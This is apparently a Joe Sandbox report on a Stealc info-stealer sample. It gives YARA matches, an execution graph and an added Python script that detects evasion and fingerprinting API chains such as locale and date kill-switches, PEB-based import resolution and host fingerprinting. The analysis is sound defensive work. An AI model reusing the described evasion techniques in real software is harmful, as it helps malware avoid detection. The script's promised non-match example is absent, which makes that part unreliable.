                            MD5 hash:C1950C4AAFA568B63462B2131C67CEAB
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1716207781.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1656030162.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:4.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:13.3%
                              Total number of Nodes:1398
                              Total number of Limit Nodes:24
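The execution graph below is printed as a flat token stream: a five-digit node id followed by the node's address and any API names it calls, and "A->B" for an edge. Read that way, the graph around 5b1bd0 shows the behaviours the report's signatures flag: GetUserDefaultLangID with an ExitProcess branch two hops away, GetSystemTime feeding sscanf and SystemTimeToFileTime before another ExitProcess, OpenEventA followed by CreateEventA, GetComputerNameA then GetUserNameA, and a GetPEB node (the graph's label for reading the PEB) leading to five LoadLibraryA calls and a run of GetProcAddress, which is how a binary importing only lstrcpy reaches the rest of the API. The following is an added example, not Joe Sandbox code: it parses that token format and searches the graph for ordered API chains within a bounded number of edges. GRAPH_EXCERPT is a subset of the graph's own tokens copied from the report (only the nodes and edges the chains run through); the rule names and hop limits are this example's assumptions, and the final one-line graph is constructed to show a non-match.

```python
"""Find evasive and fingerprinting API chains in a Joe Sandbox execution graph.

Added example, not Joe Sandbox code. The graph text format is the one printed
in the report: "ID ADDR [label ...]" defines a node, "A->B" an edge. GRAPH_EXCERPT
is a subset of that graph's tokens copied from the report (the parts the chains
run through); the rules and hop limits are this example's own.
"""
import re
from collections import defaultdict, deque

GRAPH_EXCERPT = """
28673 5b1bd0 28718 5929a0 28673->28718
28677 5b1be3 28678 5b1c09 lstrcpy 28677->28678 28679 5b1c15 GetUserDefaultLangID 28677->28679
28680 5b1c28 28679->28680 28681 5b1c3e 28679->28681 28680->28681 28682 5b1c36 ExitProcess 28680->28682
28819 5b2a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 28681->28819
28685 5b1c43 28685->28684 29024 5b29e0 GetProcessHeap RtlAllocateHeap GetUserNameA 28685->29024
28710 5b1ddc OpenEventA 28711 5b1dee 28710->28711 28712 5b1e14 CreateEventA 28710->28712
28713 5b1df0 CloseHandle Sleep OpenEventA 28711->28713 28822 5b1b00 GetSystemTime 28712->28822 28713->28712 28713->28713
28805 5b63c0 GetPEB 28804->28805 28806 5b65f3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 28805->28806
28807 5b63f3 28805->28807 28808 5b6668 28806->28808 28809 5b6655 GetProcAddress 28806->28809
28820 5b2ac4 28819->28820 28820->28685
28824 5b1b61 sscanf 29069 592930 28824->29069 28827 5b1bc9 28828 5b1bb6 28828->28827 28829 5b1bc2 ExitProcess 28828->28829
29070 592934 SystemTimeToFileTime SystemTimeToFileTime 29069->29070 29070->28827 29070->28828
"""

NODE_ID = re.compile(r"^\d{5}$")     # node ids in this graph are 5-digit decimals
EDGE = re.compile(r"^(\d+)->(\d+)$")

def parse_graph(text):
    """Return (nodes, succ): nodes[id] = {"addr", "labels"}, succ[id] = [successor ids]."""
    nodes, succ = {}, defaultdict(list)
    toks = text.split()
    i, cur = 0, None
    while i < len(toks):
        tok = toks[i]
        if (m := EDGE.match(tok)):
            succ[m.group(1)].append(m.group(2))
        elif NODE_ID.match(tok) and i + 1 < len(toks):
            cur = tok
            nodes[cur] = {"addr": toks[i + 1], "labels": []}   # token after the id is the address
            i += 1
        elif cur is not None:
            nodes[cur]["labels"].append(tok)   # API names plus notes such as "2 API calls"
        i += 1
    return nodes, succ

def reach(nodes, succ, start, api, max_hops):
    """First node reachable from `start` within `max_hops` edges whose labels include `api`."""
    seen, frontier = {start}, deque([(start, 0)])
    while frontier:
        nid, depth = frontier.popleft()
        if depth >= max_hops:
            continue
        for nxt in succ.get(nid, []):
            if api in nodes.get(nxt, {}).get("labels", []):
                return nxt
            if nxt not in seen:
                seen.add(nxt)
                frontier.append((nxt, depth + 1))
    return None

# Ordered API chains and the maximum edge distance allowed between consecutive hits.
RULES = {
    "locale_check_then_exit":      (["GetUserDefaultLangID", "ExitProcess"], 2),
    "date_check_then_exit":        (["sscanf", "SystemTimeToFileTime", "ExitProcess"], 2),
    "manual_import_resolution":    (["GetPEB", "LoadLibraryA", "GetProcAddress"], 2),
    "named_event_single_instance": (["OpenEventA", "CreateEventA"], 1),
    "host_fingerprint":            (["GetComputerNameA", "GetUserNameA"], 3),
}

def match_chain(nodes, succ, apis, max_hops):
    """Addresses along the first path that calls `apis` in order, or None."""
    for nid, n in nodes.items():
        if apis[0] not in n["labels"]:
            continue
        path, cur = [nid], nid
        for api in apis[1:]:
            cur = reach(nodes, succ, cur, api, max_hops)
            if cur is None:
                break
            path.append(cur)
        else:
            return [nodes[x]["addr"] for x in path]
    return None

def evaluate(graph_text, rules=RULES):
    """Run every rule over the graph; returns {rule: [addresses]} for the ones that hit."""
    nodes, succ = parse_graph(graph_text)
    hits = {}
    for name, (apis, hops) in rules.items():
        path = match_chain(nodes, succ, apis, hops)
        if path:
            hits[name] = path
    return hits

if __name__ == "__main__":
    for rule, path in evaluate(GRAPH_EXCERPT).items():
        print(f"{rule:28} {' -> '.join(path)}")
```

Matching on the graph rather than on a recorded call trace is what makes the kill-switch branches visible: in this run the sample did not take the ExitProcess edge after GetUserDefaultLangID (it went on to contact the C2), so a trace-based rule would never see the pair, while the graph still carries the untaken branch.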
                              execution_graph 30122 5ac559 ShellExecuteEx 30141 597650 free ctype 28673 5b1bd0 28718 5929a0 28673->28718 28677 5b1be3 28678 5b1c09 lstrcpy 28677->28678 28679 5b1c15 GetUserDefaultLangID 28677->28679 28678->28679 28680 5b1c28 28679->28680 28681 5b1c3e 28679->28681 28680->28681 28682 5b1c36 ExitProcess 28680->28682 28819 5b2a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 28681->28819 28684 5b1c6d lstrlen 28689 5b1c85 28684->28689 28685 5b1c43 28685->28684 29024 5b29e0 GetProcessHeap RtlAllocateHeap GetUserNameA 28685->29024 28687 5b1c57 28687->28684 28692 5b1c66 ExitProcess 28687->28692 28688 5b1ca9 lstrlen 28690 5b1cbf 28688->28690 28689->28688 28691 5b1c99 lstrcpy lstrcat 28689->28691 28693 5b1ce0 28690->28693 28694 5b1ccc lstrcpy lstrcat 28690->28694 28691->28688 28695 5b2a70 3 API calls 28693->28695 28694->28693 28696 5b1ce5 lstrlen 28695->28696 28697 5b1cfa 28696->28697 28698 5b1d20 lstrlen 28697->28698 28700 5b1d0d lstrcpy lstrcat 28697->28700 28699 5b1d36 28698->28699 28701 5b1d54 28699->28701 28702 5b1d40 lstrcpy lstrcat 28699->28702 28700->28698 28821 5b29e0 GetProcessHeap RtlAllocateHeap GetUserNameA 28701->28821 28702->28701 28704 5b1d59 lstrlen 28705 5b1d6d 28704->28705 28706 5b1d7d lstrcpy lstrcat 28705->28706 28707 5b1d90 28705->28707 28706->28707 28708 5b1dae lstrcpy 28707->28708 28709 5b1db6 28707->28709 28708->28709 28710 5b1ddc OpenEventA 28709->28710 28711 5b1dee 28710->28711 28712 5b1e14 CreateEventA 28710->28712 28713 5b1df0 CloseHandle Sleep OpenEventA 28711->28713 28822 5b1b00 GetSystemTime 28712->28822 28713->28712 28713->28713 28717 5b1e2d CloseHandle ExitProcess 29025 594980 28718->29025 28720 5929b1 28721 594980 2 API calls 28720->28721 28722 5929c7 28721->28722 28723 594980 2 API calls 28722->28723 28724 5929dd 28723->28724 28725 594980 2 API calls 28724->28725 28726 5929f3 28725->28726 28727 594980 2 API calls 28726->28727 28728 592a09 28727->28728 28729 594980 2 API calls 28728->28729 28730 592a1f 
28729->28730 28731 594980 2 API calls 28730->28731 28732 592a38 28731->28732 28733 594980 2 API calls 28732->28733 28734 592a4e 28733->28734 28735 594980 2 API calls 28734->28735 28736 592a64 28735->28736 28737 594980 2 API calls 28736->28737 28738 592a7a 28737->28738 28739 594980 2 API calls 28738->28739 28740 592a90 28739->28740 28741 594980 2 API calls 28740->28741 28742 592aa6 28741->28742 28743 594980 2 API calls 28742->28743 28744 592abf 28743->28744 28745 594980 2 API calls 28744->28745 28746 592ad5 28745->28746 28747 594980 2 API calls 28746->28747 28748 592aeb 28747->28748 28749 594980 2 API calls 28748->28749 28750 592b01 28749->28750 28751 594980 2 API calls 28750->28751 28752 592b17 28751->28752 28753 594980 2 API calls 28752->28753 28754 592b2d 28753->28754 28755 594980 2 API calls 28754->28755 28756 592b46 28755->28756 28757 594980 2 API calls 28756->28757 28758 592b5c 28757->28758 28759 594980 2 API calls 28758->28759 28760 592b72 28759->28760 28761 594980 2 API calls 28760->28761 28762 592b88 28761->28762 28763 594980 2 API calls 28762->28763 28764 592b9e 28763->28764 28765 594980 2 API calls 28764->28765 28766 592bb4 28765->28766 28767 594980 2 API calls 28766->28767 28768 592bcd 28767->28768 28769 594980 2 API calls 28768->28769 28770 592be3 28769->28770 28771 594980 2 API calls 28770->28771 28772 592bf9 28771->28772 28773 594980 2 API calls 28772->28773 28774 592c0f 28773->28774 28775 594980 2 API calls 28774->28775 28776 592c25 28775->28776 28777 594980 2 API calls 28776->28777 28778 592c3b 28777->28778 28779 594980 2 API calls 28778->28779 28780 592c54 28779->28780 28781 594980 2 API calls 28780->28781 28782 592c6a 28781->28782 28783 594980 2 API calls 28782->28783 28784 592c80 28783->28784 28785 594980 2 API calls 28784->28785 28786 592c96 28785->28786 28787 594980 2 API calls 28786->28787 28788 592cac 28787->28788 28789 594980 2 API calls 28788->28789 28790 592cc2 28789->28790 28791 594980 2 API calls 28790->28791 28792 592cdb 28791->28792 
28793 594980 2 API calls 28792->28793 28794 592cf1 28793->28794 28795 594980 2 API calls 28794->28795 28796 592d07 28795->28796 28797 594980 2 API calls 28796->28797 28798 592d1d 28797->28798 28799 594980 2 API calls 28798->28799 28800 592d33 28799->28800 28801 594980 2 API calls 28800->28801 28802 592d49 28801->28802 28803 594980 2 API calls 28802->28803 28804 592d62 28803->28804 28805 5b63c0 GetPEB 28804->28805 28806 5b65f3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 28805->28806 28807 5b63f3 28805->28807 28808 5b6668 28806->28808 28809 5b6655 GetProcAddress 28806->28809 28816 5b6407 20 API calls 28807->28816 28810 5b669c 28808->28810 28811 5b6671 GetProcAddress GetProcAddress 28808->28811 28809->28808 28812 5b66b8 28810->28812 28813 5b66a5 GetProcAddress 28810->28813 28811->28810 28814 5b66c1 GetProcAddress 28812->28814 28815 5b66d4 28812->28815 28813->28812 28814->28815 28817 5b66dd GetProcAddress GetProcAddress 28815->28817 28818 5b6707 28815->28818 28816->28806 28817->28818 28818->28677 28820 5b2ac4 28819->28820 28820->28685 28821->28704 29030 5b1800 28822->29030 28824 5b1b61 sscanf 29069 592930 28824->29069 28827 5b1bc9 28830 5b01d0 28827->28830 28828 5b1bb6 28828->28827 28829 5b1bc2 ExitProcess 28828->28829 28831 5b01fa 28830->28831 28832 5b0229 lstrcpy 28831->28832 28833 5b0235 28831->28833 28832->28833 28834 5b024b lstrlen 28833->28834 28835 5b0268 28834->28835 28836 5b028b lstrlen 28835->28836 28837 5b027f lstrcpy 28835->28837 28838 5b02a8 28836->28838 28837->28836 28839 5b02cb lstrlen 28838->28839 28840 5b02bf lstrcpy 28838->28840 28841 5b02e8 28839->28841 28840->28839 28842 5b030b 28841->28842 28843 5b02ff lstrcpy 28841->28843 29071 5b1550 28842->29071 28843->28842 28846 5b0339 28847 5b035c lstrlen 28846->28847 28848 5b0350 lstrcpy 28846->28848 28849 5b0376 28847->28849 28848->28847 28850 5b0399 lstrlen 28849->28850 28851 5b038d lstrcpy 28849->28851 28852 5b03b0 28850->28852 28851->28850 28853 5b03d0 lstrlen 28852->28853 28854 
5b03c4 lstrcpy 28852->28854 28855 5b0407 28853->28855 28854->28853 28856 5b041b lstrcpy 28855->28856 28857 5b0427 28855->28857 28856->28857 29081 592d90 28857->29081 28865 5b0699 28866 5b1550 4 API calls 28865->28866 28867 5b06aa 28866->28867 28868 5b06dd 28867->28868 28869 5b06d5 lstrcpy 28867->28869 29837 5b7340 lstrlen 28868->29837 28869->28868 28871 5b06f1 28872 5b0722 28871->28872 28873 5b071a lstrcpy 28871->28873 28874 5b7340 3 API calls 28872->28874 28873->28872 28875 5b0741 28874->28875 28876 5b076f 28875->28876 28877 5b0767 lstrcpy 28875->28877 28878 5b7340 3 API calls 28876->28878 28877->28876 28879 5b0791 28878->28879 28880 5b07cb 28879->28880 28881 5b07c3 lstrcpy 28879->28881 29841 5b7210 28880->29841 28881->28880 28889 5b0811 30012 5a8d00 StrCmpCA 28889->30012 28891 5b081f 28892 5b7210 lstrcpy 28891->28892 28893 5b0857 28892->28893 28894 591410 8 API calls 28893->28894 28895 5b086a 28894->28895 30030 596000 80 API calls 28895->30030 28897 5b0870 30031 5a8240 10 API calls 28897->30031 28899 5b087e 28900 5b7210 lstrcpy 28899->28900 28901 5b08b6 28900->28901 28902 591410 8 API calls 28901->28902 28903 5b08c9 28902->28903 30032 596000 80 API calls 28903->30032 28905 5b08cf 30033 5a7f60 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 28905->30033 28907 5b08dd 28908 5b7210 lstrcpy 28907->28908 28909 5b0914 28908->28909 28910 591410 8 API calls 28909->28910 28911 5b0927 28910->28911 30034 596000 80 API calls 28911->30034 28913 5b092d 30035 5a80e0 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 28913->30035 28915 5b093b 28916 591410 8 API calls 28915->28916 28917 5b096a 28916->28917 28918 5b09ab lstrcpy 28917->28918 28919 5b09b3 28917->28919 28918->28919 30036 595570 8 API calls 28919->30036 28921 5b09b8 28922 591410 8 API calls 28921->28922 28923 5b0a0e 28922->28923 30037 5a7700 1357 API calls 28923->30037 28925 5b0a13 28926 5b7210 lstrcpy 28925->28926 28927 5b0a4e 28926->28927 28928 591410 8 API calls 28927->28928 28929 5b0a61 28928->28929 30038 596000 80 API calls 
28929->30038 28931 5b0a67 30039 5a8470 7 API calls 28931->30039 28933 5b0a75 28934 591410 8 API calls 28933->28934 28935 5b0abf 28934->28935 30040 5923e0 230 API calls 28935->30040 28937 5b0aca 28938 5b0ada 28937->28938 28939 5b0b87 28937->28939 28943 5b0b1e 28938->28943 28944 5b0b16 lstrcpy 28938->28944 28940 5b0bb2 28939->28940 28941 5b0baa lstrcpy 28939->28941 28942 591410 8 API calls 28940->28942 28941->28940 28945 5b0bc5 28942->28945 28946 591410 8 API calls 28943->28946 28944->28943 30044 596000 80 API calls 28945->30044 28948 5b0b31 28946->28948 30041 596000 80 API calls 28948->30041 28949 5b0bcb 30045 5ac940 70 API calls 28949->30045 28952 5b0b37 30042 5a8640 47 API calls 28952->30042 28953 5b0b7f 28956 5b0c09 28953->28956 28959 591410 8 API calls 28953->28959 28955 5b0b42 28957 591410 8 API calls 28955->28957 28960 5b0c2d 28956->28960 28964 591410 8 API calls 28956->28964 28958 5b0b74 28957->28958 30043 5ad1f0 118 API calls 28958->30043 28963 5b0bf2 28959->28963 28962 5b0c51 28960->28962 28966 591410 8 API calls 28960->28966 28968 5b0c75 28962->28968 28973 591410 8 API calls 28962->28973 30046 5ad8c0 103 API calls __setmbcp_nolock 28963->30046 28965 5b0c28 28964->28965 30048 5ae0c0 149 API calls 28965->30048 28971 5b0c4c 28966->28971 28969 5b0c99 28968->28969 28974 591410 8 API calls 28968->28974 28975 5b0cbd 28969->28975 28980 591410 8 API calls 28969->28980 30049 5ae640 108 API calls 28971->30049 28972 5b0bf7 28977 591410 8 API calls 28972->28977 28978 5b0c70 28973->28978 28979 5b0c94 28974->28979 28982 5b0ce1 28975->28982 28988 591410 8 API calls 28975->28988 28981 5b0c04 28977->28981 30050 5ae880 120 API calls 28978->30050 30051 5aeb40 110 API calls 28979->30051 28986 5b0cb8 28980->28986 30047 5aee10 97 API calls 28981->30047 28984 5b0d05 28982->28984 28989 591410 8 API calls 28982->28989 28995 5b0dbd 28984->28995 28997 5b0d15 28984->28997 30052 597b10 153 API calls 28986->30052 28991 5b0cdc 28988->28991 28992 5b0d00 28989->28992 30053 5aecd0 108 API 
calls 28991->30053 30054 5b41c0 91 API calls 28992->30054 28996 5b0de8 28995->28996 28998 5b0de0 lstrcpy 28995->28998 29001 591410 8 API calls 28996->29001 28999 5b0d4c lstrcpy 28997->28999 29000 5b0d54 28997->29000 28998->28996 28999->29000 29002 591410 8 API calls 29000->29002 29003 5b0dfb 29001->29003 29004 5b0d67 29002->29004 30058 596000 80 API calls 29003->30058 30055 596000 80 API calls 29004->30055 29007 5b0e01 30059 5ac940 70 API calls 29007->30059 29008 5b0d6d 30056 5a8640 47 API calls 29008->30056 29011 5b0d78 29012 591410 8 API calls 29011->29012 29013 5b0daa 29012->29013 30057 5ad1f0 118 API calls 29013->30057 29014 5b0db5 29016 5b0e38 29014->29016 29017 5b0e30 lstrcpy 29014->29017 29018 591410 8 API calls 29016->29018 29017->29016 29019 5b0e4b 29018->29019 30060 596000 80 API calls 29019->30060 29021 5b0e57 29023 5b0e73 29021->29023 30061 5b1640 12 API calls 29021->30061 29023->28717 29024->28687 29026 594996 RtlAllocateHeap 29025->29026 29029 5949d4 VirtualProtect 29026->29029 29029->28720 29031 5b180e 29030->29031 29032 5b1829 lstrcpy 29031->29032 29033 5b1835 lstrlen 29031->29033 29032->29033 29034 5b1853 29033->29034 29035 5b1865 lstrcpy lstrcat 29034->29035 29036 5b1878 29034->29036 29035->29036 29037 5b18a7 29036->29037 29038 5b189f lstrcpy 29036->29038 29039 5b18ae lstrlen 29037->29039 29038->29037 29040 5b18c6 29039->29040 29041 5b18d2 lstrcpy lstrcat 29040->29041 29042 5b18e6 29040->29042 29041->29042 29043 5b1915 29042->29043 29044 5b190d lstrcpy 29042->29044 29045 5b191c lstrlen 29043->29045 29044->29043 29046 5b1938 29045->29046 29047 5b194a lstrcpy lstrcat 29046->29047 29048 5b195d 29046->29048 29047->29048 29049 5b198c 29048->29049 29050 5b1984 lstrcpy 29048->29050 29051 5b1993 lstrlen 29049->29051 29050->29049 29052 5b19ab 29051->29052 29053 5b19b7 lstrcpy lstrcat 29052->29053 29054 5b19cb 29052->29054 29053->29054 29055 5b19fa 29054->29055 29056 5b19f2 lstrcpy 29054->29056 29057 5b1a01 lstrlen 29055->29057 29056->29055 29058 5b1a1d 
29057->29058 29059 5b1a2f lstrcpy lstrcat 29058->29059 29060 5b1a42 29058->29060 29059->29060 29061 5b1a71 29060->29061 29062 5b1a69 lstrcpy 29060->29062 29063 5b1a78 lstrlen 29061->29063 29062->29061 29065 5b1a94 29063->29065 29064 5b1ab9 29067 5b1ae8 29064->29067 29068 5b1ae0 lstrcpy 29064->29068 29065->29064 29066 5b1aa6 lstrcpy lstrcat 29065->29066 29066->29064 29067->28824 29068->29067 29070 592934 SystemTimeToFileTime SystemTimeToFileTime 29069->29070 29070->28827 29070->28828 29072 5b155f 29071->29072 29073 5b157f lstrcpy 29072->29073 29074 5b1587 29072->29074 29073->29074 29075 5b15b7 lstrcpy 29074->29075 29076 5b15bf 29074->29076 29075->29076 29077 5b15ef lstrcpy 29076->29077 29078 5b15f7 29076->29078 29077->29078 29079 5b031c lstrlen 29078->29079 29080 5b1627 lstrcpy 29078->29080 29079->28846 29080->29079 29082 594980 2 API calls 29081->29082 29083 592da2 29082->29083 29084 594980 2 API calls 29083->29084 29085 592dc0 29084->29085 29086 594980 2 API calls 29085->29086 29087 592dd6 29086->29087 29088 594980 2 API calls 29087->29088 29089 592deb 29088->29089 29090 594980 2 API calls 29089->29090 29091 592e0c 29090->29091 29092 594980 2 API calls 29091->29092 29093 592e21 29092->29093 29094 594980 2 API calls 29093->29094 29095 592e39 29094->29095 29096 594980 2 API calls 29095->29096 29097 592e5a 29096->29097 29098 594980 2 API calls 29097->29098 29099 592e6f 29098->29099 29100 594980 2 API calls 29099->29100 29101 592e85 29100->29101 29102 594980 2 API calls 29101->29102 29103 592e9b 29102->29103 29104 594980 2 API calls 29103->29104 29105 592eb1 29104->29105 29106 594980 2 API calls 29105->29106 29107 592eca 29106->29107 29108 594980 2 API calls 29107->29108 29109 592ee0 29108->29109 29110 594980 2 API calls 29109->29110 29111 592ef6 29110->29111 29112 594980 2 API calls 29111->29112 29113 592f0c 29112->29113 29114 594980 2 API calls 29113->29114 29115 592f22 29114->29115 29116 594980 2 API calls 29115->29116 29117 592f38 29116->29117 29118 594980 2 API 
calls 29117->29118 29119 592f51 29118->29119 29120 594980 2 API calls 29119->29120 29121 592f67 29120->29121 29122 594980 2 API calls 29121->29122 29123 592f7d 29122->29123 29124 594980 2 API calls 29123->29124 29125 592f93 29124->29125 29126 594980 2 API calls 29125->29126 29127 592fa9 29126->29127 29128 594980 2 API calls 29127->29128 29129 592fbf 29128->29129 29130 594980 2 API calls 29129->29130 29131 592fd8 29130->29131 29132 594980 2 API calls 29131->29132 29133 592fee 29132->29133 29134 594980 2 API calls 29133->29134 29135 593004 29134->29135 29136 594980 2 API calls 29135->29136 29137 59301a 29136->29137 29138 594980 2 API calls 29137->29138 29139 593030 29138->29139 29140 594980 2 API calls 29139->29140 29141 593046 29140->29141 29142 594980 2 API calls 29141->29142 29143 59305f 29142->29143 29144 594980 2 API calls 29143->29144 29145 593075 29144->29145 29146 594980 2 API calls 29145->29146 29147 59308b 29146->29147 29148 594980 2 API calls 29147->29148 29149 5930a1 29148->29149 29150 594980 2 API calls 29149->29150 29151 5930b7 29150->29151 29152 594980 2 API calls 29151->29152 29153 5930cd 29152->29153 29154 594980 2 API calls 29153->29154 29155 5930e6 29154->29155 29156 594980 2 API calls 29155->29156 29157 5930fc 29156->29157 29158 594980 2 API calls 29157->29158 29159 593112 29158->29159 29160 594980 2 API calls 29159->29160 29161 593128 29160->29161 29162 594980 2 API calls 29161->29162 29163 59313e 29162->29163 29164 594980 2 API calls 29163->29164 29165 593154 29164->29165 29166 594980 2 API calls 29165->29166 29167 59316d 29166->29167 29168 594980 2 API calls 29167->29168 29169 593183 29168->29169 29170 594980 2 API calls 29169->29170 29171 593199 29170->29171 29172 594980 2 API calls 29171->29172 29173 5931af 29172->29173 29174 594980 2 API calls 29173->29174 29175 5931c5 29174->29175 29176 594980 2 API calls 29175->29176 29177 5931db 29176->29177 29178 594980 2 API calls 29177->29178 29179 5931f4 29178->29179 29180 594980 2 API calls 
29179->29180 29181 59320a 29180->29181 29182 594980 2 API calls 29181->29182 29183 593220 29182->29183 29184 594980 2 API calls 29183->29184 29185 593236 29184->29185 29186 594980 2 API calls 29185->29186 29187 59324c 29186->29187 29188 594980 2 API calls 29187->29188 29189 593262 29188->29189 29190 594980 2 API calls 29189->29190 29191 59327b 29190->29191 29192 594980 2 API calls 29191->29192 29193 593291 29192->29193 29194 594980 2 API calls 29193->29194 29195 5932a7 29194->29195 29196 594980 2 API calls 29195->29196 29197 5932bd 29196->29197 29198 594980 2 API calls 29197->29198 29199 5932d3 29198->29199 29200 594980 2 API calls 29199->29200 29201 5932e9 29200->29201 29202 594980 2 API calls 29201->29202 29203 593302 29202->29203 29204 594980 2 API calls 29203->29204 29205 593318 29204->29205 29206 594980 2 API calls 29205->29206 29207 59332e 29206->29207 29208 594980 2 API calls 29207->29208 29209 593344 29208->29209 29210 594980 2 API calls 29209->29210 29211 59335a 29210->29211 29212 594980 2 API calls 29211->29212 29213 593370 29212->29213 29214 594980 2 API calls 29213->29214 29215 593389 29214->29215 29216 594980 2 API calls 29215->29216 29217 59339f 29216->29217 29218 594980 2 API calls 29217->29218 29219 5933b5 29218->29219 29220 594980 2 API calls 29219->29220 29221 5933cb 29220->29221 29222 594980 2 API calls 29221->29222 29223 5933e1 29222->29223 29224 594980 2 API calls 29223->29224 29225 5933f7 29224->29225 29226 594980 2 API calls 29225->29226 29227 593410 29226->29227 29228 594980 2 API calls 29227->29228 29229 593426 29228->29229 29230 594980 2 API calls 29229->29230 29231 59343c 29230->29231 29232 594980 2 API calls 29231->29232 29233 593452 29232->29233 29234 594980 2 API calls 29233->29234 29235 593468 29234->29235 29236 594980 2 API calls 29235->29236 29237 59347e 29236->29237 29238 594980 2 API calls 29237->29238 29239 593497 29238->29239 29240 594980 2 API calls 29239->29240 29241 5934ad 29240->29241 29242 594980 2 API calls 29241->29242 
29243 5934c3 29242->29243 29244 594980 2 API calls 29243->29244 29245 5934d9 29244->29245 29246 594980 2 API calls 29245->29246 29247 5934ef 29246->29247 29248 594980 2 API calls 29247->29248 29249 593505 29248->29249 29250 594980 2 API calls 29249->29250 29251 59351e 29250->29251 29252 594980 2 API calls 29251->29252 29253 593534 29252->29253 29254 594980 2 API calls 29253->29254 29255 59354a 29254->29255 29256 594980 2 API calls 29255->29256 29257 593560 29256->29257 29258 594980 2 API calls 29257->29258 29259 593576 29258->29259 29260 594980 2 API calls 29259->29260 29261 59358c 29260->29261 29262 594980 2 API calls 29261->29262 29263 5935a5 29262->29263 29264 594980 2 API calls 29263->29264 29265 5935bb 29264->29265 29266 594980 2 API calls 29265->29266 29267 5935d1 29266->29267 29268 594980 2 API calls 29267->29268 29269 5935e7 29268->29269 29270 594980 2 API calls 29269->29270 29271 5935fd 29270->29271 29272 594980 2 API calls 29271->29272 29273 593613 29272->29273 29274 594980 2 API calls 29273->29274 29275 59362c 29274->29275 29276 594980 2 API calls 29275->29276 29277 593642 29276->29277 29278 594980 2 API calls 29277->29278 29279 593658 29278->29279 29280 594980 2 API calls 29279->29280 29281 59366e 29280->29281 29282 594980 2 API calls 29281->29282 29283 593684 29282->29283 29284 594980 2 API calls 29283->29284 29285 59369a 29284->29285 29286 594980 2 API calls 29285->29286 29287 5936b3 29286->29287 29288 594980 2 API calls 29287->29288 29289 5936c9 29288->29289 29290 594980 2 API calls 29289->29290 29291 5936df 29290->29291 29292 594980 2 API calls 29291->29292 29293 5936f5 29292->29293 29294 594980 2 API calls 29293->29294 29295 59370b 29294->29295 29296 594980 2 API calls 29295->29296 29297 593721 29296->29297 29298 594980 2 API calls 29297->29298 29299 59373a 29298->29299 29300 594980 2 API calls 29299->29300 29301 593750 29300->29301 29302 594980 2 API calls 29301->29302 29303 593766 29302->29303 29304 594980 2 API calls 29303->29304 29305 59377c 
29304->29305 29306 594980 2 API calls 29305->29306 29307 593792 29306->29307 29308 594980 2 API calls 29307->29308 29309 5937a8 29308->29309 29310 594980 2 API calls 29309->29310 29311 5937c1 29310->29311 29312 594980 2 API calls 29311->29312 29313 5937d7 29312->29313 29314 594980 2 API calls 29313->29314 29315 5937ed 29314->29315 29316 594980 2 API calls 29315->29316 29317 593803 29316->29317 29318 594980 2 API calls 29317->29318 29319 593819 29318->29319 29320 594980 2 API calls 29319->29320 29321 59382f 29320->29321 29322 594980 2 API calls 29321->29322 29323 593848 29322->29323 29324 594980 2 API calls 29323->29324 29325 59385e 29324->29325 29326 594980 2 API calls 29325->29326 29327 593874 29326->29327 29328 594980 2 API calls 29327->29328 29329 59388a 29328->29329 29330 594980 2 API calls 29329->29330 29331 5938a0 29330->29331 29332 594980 2 API calls 29331->29332 29333 5938b6 29332->29333 29334 594980 2 API calls 29333->29334 29335 5938cf 29334->29335 29336 594980 2 API calls 29335->29336 29337 5938e5 29336->29337 29338 594980 2 API calls 29337->29338 29339 5938fb 29338->29339 29340 594980 2 API calls 29339->29340 29341 593911 29340->29341 29342 594980 2 API calls 29341->29342 29343 593927 29342->29343 29344 594980 2 API calls 29343->29344 29345 59393d 29344->29345 29346 594980 2 API calls 29345->29346 29347 593956 29346->29347 29348 594980 2 API calls 29347->29348 29349 59396c 29348->29349 29350 594980 2 API calls 29349->29350 29351 593982 29350->29351 29352 594980 2 API calls 29351->29352 29353 593998 29352->29353 29354 594980 2 API calls 29353->29354 29355 5939ae 29354->29355 29356 594980 2 API calls 29355->29356 29357 5939c4 29356->29357 29358 594980 2 API calls 29357->29358 29359 5939dd 29358->29359 29360 594980 2 API calls 29359->29360 29361 5939f3 29360->29361 29362 594980 2 API calls 29361->29362 29363 593a09 29362->29363 29364 594980 2 API calls 29363->29364 29365 593a1f 29364->29365 29366 594980 2 API calls 29365->29366 29367 593a35 29366->29367 
Call graph (continuation; rendered graph data replaced with a summary of the nodes it contains):
• 593a4b-59496a: a straight-line chain of roughly 200 consecutive calls into 594980 (2 API calls each), ending at 59496a.
• 5b6710-5b71a7: API resolution routine; 5b671d (43 API calls), 5b6b2e (8 API calls), 5b6bc4 GetProcAddress * 5, 5b6c45 (8 API calls), 5b6d0b GetProcAddress * 5, 5b6d8c (6 API calls), 5b6e26 (12 API calls), 5b6f49 GetProcAddress * 5, 5b6fc6 GetProcAddress * 2, 5b6ffa GetProcAddress * 2, 5b7032 (10 API calls), 5b7126 GetProcAddress * 4, 5b718b GetProcAddress, 5b71a7 GetProcAddress * 4; exits to 5b067a.
• 591410 / 591510: lstrcpy chains.
• 5af300-5b00fd: string handling built from lstrlen / lstrcpy; StrCmpCA comparisons at 5af788, 5af88a, 5afb30, 5afbcb, 5afe70 and 5aff0b; Sleep at 5aff1f; calls into 5af100 (35 API calls), 5aefe0 (28 API calls), 591410 (8 API calls) and 591510 (4 API calls).
• 5b7340: lstrcpy lstrcat; 5b7216 / 5b7258 / 5b7210: lstrcpy.
